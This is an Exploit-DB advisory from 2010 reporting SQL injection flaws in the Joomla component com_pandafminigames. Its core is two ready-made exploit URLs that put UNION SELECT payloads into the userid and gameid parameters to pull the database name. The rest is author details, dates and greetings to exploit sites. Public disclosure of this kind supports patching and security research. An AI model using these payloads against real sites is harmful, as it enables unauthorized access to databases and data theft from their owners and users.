exploit-db-mirror/exploits/php/webapps/12270.txt

# Exploit Title: Joomla Component com_pandafminigames SQL Injection Vulnerabilities
# Date: 16.04.2010
# Author: Valentin
# Category: webapps/0day
# Version: unknown
# Tested on:
# CVE :
# Code :


[:::::::::::::::::::::::::::::::::::::: 0x1 ::::::::::::::::::::::::::::::::::::::]
|:: >> General Information
|:: Advisory/Exploit Title = Joomla Component com_pandafminigames SQL Injection Vulnerabilities
|:: By = Valentin Hoebel
|:: Contact = valentin@xenuser.org
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x2 ::::::::::::::::::::::::::::::::::::::]
|:: >> Product information
|:: Name = com_pandafminigames
|:: Affected Version(s) = unknown
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x3 ::::::::::::::::::::::::::::::::::::::]
|:: >> #1 Vulnerability
|:: Type = multiple SQL Injection vulnerabilities
|:: Example URL #1 = index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+AND+1=2+UNION+SELECT+concat(database()),2,concat(database()),4,5,6,7,8,9,10,11,12--
|:: Example URL #2 = index.php?option=com_pandafminigames&Itemid=XX&gameid=X+AND+1=2+UNION+SELECT+concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),concat(database()),7,8--
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x4 ::::::::::::::::::::::::::::::::::::::]
|:: >> Additional Information
|:: Advisory/Exploit Published = 16.04.2010
|::
|::
[:::::::::::::::::::::::::::::::::::::: 0x5 ::::::::::::::::::::::::::::::::::::::]
|:: >> Misc
|:: Greetz && Thanks = inj3ct0r team, Exploit DB, hack0wn and ExpBase!
|::
|::
[:::::::::::::::::::::::::::::::::::::: EOF ::::::::::::::::::::::::::::::::::::::]